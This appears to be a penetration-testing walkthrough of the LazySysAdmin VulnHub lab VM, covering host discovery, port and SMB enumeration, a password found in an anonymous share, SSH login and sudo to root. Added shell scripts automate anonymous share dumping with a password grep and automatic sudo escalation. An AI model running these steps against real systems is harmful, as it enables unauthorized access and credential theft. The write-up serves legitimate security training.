LazySysAdmin Walkthrough

Introduction

Today we're doing a boot2root pentest walkthrough of the LazySysAdmin machine, created by Togie Mcdogie and hosted at https://www.vulnhub.com/entry/lazysysadmin-1,205/ .

For this pentest, I will be using two virtual machines. A Kali Linux machine as the attacking system, and the LazySysAdmin machine as the target system.

Locating The Target

Running netdiscover from our attacking machine, we can locate the target on our network. It sends ARP requests across the 10.0.2.0/24 range and lists every host that answers, along with its MAC address and vendor.

netdiscover -r 10.0.2.0/24


Our target system is at 10.0.2.28.

Scanning and Enumeration

We start our scans with nmap to determine which TCP ports are open on the target.

nmap -T4 -p- 10.0.2.28


A nice array of open ports. Let's feed these back into nmap with -A (service and version detection, OS detection, default NSE scripts and traceroute) to get further info on each service.

nmap -T4 -A -p22,80,139,445,3306,6667 10.0.2.28
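The two scans above are the usual pattern: sweep all 65535 TCP ports first, then run the slow service/version scan only against what is open. Retyping the port list by hand is error-prone, so here is an added example (not part of the original walkthrough) that chains the two steps using nmap's grepable output. The target address is the page's 10.0.2.28; the sample -oG line embedded below is constructed so the port-extraction step can be tested offline, and the 8080/filtered entry in it is there only to show that non-open ports are dropped.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): feed the open ports from
# a full-range TCP sweep straight into the service/version scan.
# Uses nmap's grepable (-oG) output. The sample line below is constructed.

# Print the open TCP ports from grepable nmap output (stdin) as a comma list,
# e.g. "22,80,139,445,3306,6667". Filtered/closed ports are ignored.
open_ports_from_grepable() {
    grep -o '[0-9][0-9]*/open/tcp' | cut -d/ -f1 | sort -n -u | paste -s -d, -
}

# Constructed sample of a -oG "Host:" line for the page's target; not real output.
sample_grepable() {
    printf 'Host: 10.0.2.28 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 3306/open/tcp//mysql///, 6667/open/tcp//irc///, 8080/filtered/tcp//http-proxy///\tIgnored State: closed (65528)\n'
}

# Full workflow: sweep every TCP port, then version-scan only what is open.
# Both scans are saved to disk so the results survive the terminal session.
full_scan() {
    target=$1
    nmap -T4 -p- -oG "sweep_${target}.gnmap" "$target" >/dev/null || return 1
    ports=$(open_ports_from_grepable < "sweep_${target}.gnmap")
    if [ -z "$ports" ]; then
        echo "no open TCP ports found on $target" >&2
        return 1
    fi
    echo "open ports on $target: $ports"
    nmap -T4 -A -p "$ports" -oN "services_${target}.nmap" "$target"
}

# Usage: sh scan.sh 10.0.2.28
# With no argument, only demonstrate the parser on the constructed sample.
if [ $# -gt 0 ]; then
    full_scan "$1"
else
    echo "sample parse: $(sample_grepable | open_ports_from_grepable)"
fi
```

The -oG format puts every port on the single "Host:" line as `port/state/proto//service///`, which is why a plain grep for `/open/tcp` is enough; if you also want UDP results from a `-sU` sweep, add a second pattern for `/open/udp`.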


The version scan also pulled the web server's robots.txt, and there are some interesting entries in it that we'll want to check out later. For now, we'll run a Nikto scan against the web server.

nikto -h 10.0.2.28


Two important findings here. First, Nikto located the system's phpMyAdmin page, which we can test for known vulnerabilities in the installed version, or simply log into if we capture some credentials later. Second, an info.php (phpinfo) page is exposed. That discloses the PHP version, loaded modules, configuration settings and filesystem paths, which is exactly the information we would need to turn a local file inclusion vulnerability into something useful if we find one.

Next, we'll scan the system's SMB service using enum4linux.

enum4linux -a 10.0.2.28

Some good results here. First of all, the SMB service allows null sessions: we can connect without supplying a username or password. Second, we have a list of SMB shares that we can look through, and lastly we got a username for the system, togie.

Let's follow up on this by connecting to the share$ share with smbclient and listing its contents. The -N flag tells smbclient not to prompt for a password, which is how we ask for a null session. (The share name is quoted so the shell doesn't try to interpret the trailing $.)

smbclient -N '//10.0.2.28/share$'

ls


There are a lot of files to look through here, and we have read access, so we'll download this important-looking file and cat it out on our own machine.

get deets.txt
exit
cat deets.txt
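Poking through a share by hand is fine for one box, but the null-session check, the share listing and the "download everything and grep it for passwords" step are the same every time. Here is an added example (not part of the original walkthrough) that automates them with smbclient. The host 10.0.2.28 and the share$ share come from the page; the sample share listing and the sample note file embedded below are constructed stand-ins for the enum4linux output and deets.txt so the parsing and the credential grep can be tested offline.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): enumerate a Samba server
# over a null session, pull every readable disk share to disk, and grep the
# loot for anything that looks like a password.
# The sample listing and sample file below are constructed, not real output.

# Print the Disk share names from `smbclient -N -L //host` output (stdin).
# Share names containing spaces are not handled by this simple parser.
shares_from_listing() {
    awk '
        /Sharename/                 { in_table = 1; next }
        in_table && /^[ \t]*-+/     { next }
        in_table && NF == 0         { in_table = 0 }
        in_table && $2 == "Disk"    { print $1 }
    '
}

# Constructed sample of a share listing. print$ and IPC$ are Samba defaults;
# share$ is the share from the page.
sample_share_listing() {
    cat <<'EOF'
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        share$          Disk
        IPC$            IPC       IPC Service

        Server               Comment
        ---------            -------
EOF
}

# Recursively download one share over a null session into loot/<host>/<share>.
dump_share() {
    host=$1; share=$2
    dest="loot/$host/$share"
    mkdir -p "$dest"
    smbclient -N "//$host/$share" -D / \
        -c "lcd $dest; recurse ON; prompt OFF; mget *" \
        || echo "share $share is not readable anonymously" >&2
}

# Print file:line:text for anything that looks like a password assignment.
find_credentials() {
    grep -rniE '(pass(word|wd)?|pwd)[[:space:]]*[:=]' "$1" 2>/dev/null
}

# Enumerate every disk share, dump it, then hunt for credentials in the loot.
dump_all_shares() {
    host=$1
    smbclient -N -L "//$host" | shares_from_listing | while read -r share; do
        dump_share "$host" "$share"
    done
    find_credentials "loot/$host"
}

# Constructed stand-in for the note found in share$ (the real one is deets.txt).
write_sample_loot() {
    mkdir -p "$1"
    printf 'Remember to update your password after the server change.\n\nPassword: 12345\n' > "$1/deets.txt"
    printf 'nothing to see here\n' > "$1/readme.txt"
}

# Usage: sh smbloot.sh 10.0.2.28
# With no argument, only demonstrate the parser on the constructed listing.
if [ $# -gt 0 ]; then
    dump_all_shares "$1"
else
    echo "disk shares in sample listing: $(sample_share_listing | shares_from_listing | paste -s -d, -)"
fi
```

The `-c` string is a list of smbclient commands separated by semicolons: `recurse ON` makes `mget *` descend into subdirectories and `prompt OFF` stops it asking about each file. Shares that refuse anonymous access (print$ usually does) just produce an error and are skipped, so the loop still gets to the ones that matter.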


Finding a Way In

It can't be this easy, can it? deets.txt gives us a password (12345) and enum4linux gave us a username (togie), so let's try the pair over SSH and then see what sudo lets that user do.

ssh togie@10.0.2.28
12345   (togie's password, at the SSH prompt)
sudo -l
12345   (togie's password again, at the sudo prompt)
sudo su
cd /root/
cat proof.txt


Privilege Escalation

We're logged into the target system as togie. sudo -l shows that togie is the system's administrator account and can run any command as root through sudo, so sudo su drops us straight into a root shell. From there we change to the /root/ directory and cat out the flag file, proof.txt.
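The reason sudo su works here is the specific line sudo -l prints for togie: an "(ALL : ALL) ALL" entry, which is full root. Other boxes give you a NOPASSWD entry for one binary, or nothing at all, and each of those calls for a different next step. Here is an added example (not part of the original walkthrough) that classifies sudo -l output so you know which case you are in before typing anything. The username togie and the LazySysAdmin host name come from the page; the sample sudo output for each case is constructed, and the www-data/find entry is a made-up illustration of the NOPASSWD case.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): read `sudo -l` output and
# decide what it actually gives you. All sample output below is constructed.

# Classify `sudo -l` output (stdin) as one of:
#   full-root - user may run ALL commands as ALL users (sudo su / sudo -i works)
#   nopasswd  - at least one command runs without a password (check it on GTFOBins)
#   limited   - only specific commands, password required
#   none      - nothing allowed, or sudo refused us
classify_sudo_rights() {
    # Keep only the rule lines that follow the "may run the following commands" header.
    rules=$(sed -n '/may run the following commands/,$p' | sed 1d | grep '^[[:space:]]*(' || true)
    if printf '%s\n' "$rules" | grep -Eq '^[[:space:]]*\(ALL([[:space:]]*:[[:space:]]*ALL)?\)[[:space:]]+(NOPASSWD:[[:space:]]*)?ALL[[:space:]]*$'; then
        echo full-root
    elif printf '%s\n' "$rules" | grep -q 'NOPASSWD:'; then
        echo nopasswd
    elif [ -n "$rules" ]; then
        echo limited
    else
        echo none
    fi
}

# Constructed sample of what a full-sudo user (the togie case) sees.
sample_sudo_full() {
    cat <<'EOF'
Matching Defaults entries for togie on LazySysAdmin:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User togie may run the following commands on LazySysAdmin:
    (ALL : ALL) ALL
EOF
}

# Constructed sample of a restricted user with a single NOPASSWD entry.
sample_sudo_nopasswd() {
    cat <<'EOF'
User www-data may run the following commands on LazySysAdmin:
    (root) NOPASSWD: /usr/bin/find
EOF
}

# Constructed sample of a user sudo rejects outright.
sample_sudo_none() {
    printf 'Sorry, user bob may not run sudo on LazySysAdmin.\n'
}

# On the target: classify our own rights and escalate if it is the easy case.
escalate() {
    case "$(sudo -l 2>/dev/null | classify_sudo_rights)" in
        full-root) exec sudo su - ;;
        nopasswd)  echo "NOPASSWD entry present; check the binary on GTFOBins" >&2; return 1 ;;
        *)         echo "no direct root path from sudo; review 'sudo -l' by hand" >&2; return 1 ;;
    esac
}

# Usage on the target: sh sudocheck.sh --escalate
# With no argument, only demonstrate the classifier on the constructed samples.
if [ "${1:-}" = "--escalate" ]; then
    escalate
else
    echo "full sample:     $(sample_sudo_full | classify_sudo_rights)"
    echo "nopasswd sample: $(sample_sudo_nopasswd | classify_sudo_rights)"
    echo "none sample:     $(sample_sudo_none | classify_sudo_rights)"
fi
```

The full-root pattern deliberately accepts both "(ALL : ALL) ALL" and the older "(ALL) ALL" form, with or without NOPASSWD, since any of them lets you run sudo su. Anything else still needs a human look: a limited entry can be just as fatal as full sudo if the allowed binary can spawn a shell.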

Summary

After our initial scans, we found that the target's SMB service was misconfigured to allow null sessions. Looking through the files in the share$ share, we found a note that disclosed a password. The same SMB enumeration had revealed a single user on the system, togie, so we tried that username with the disclosed password and logged in over SSH. Once logged in, sudo -l showed that togie has full sudo rights, so we switched to root with sudo su and read the flag from /root/proof.txt.

Finish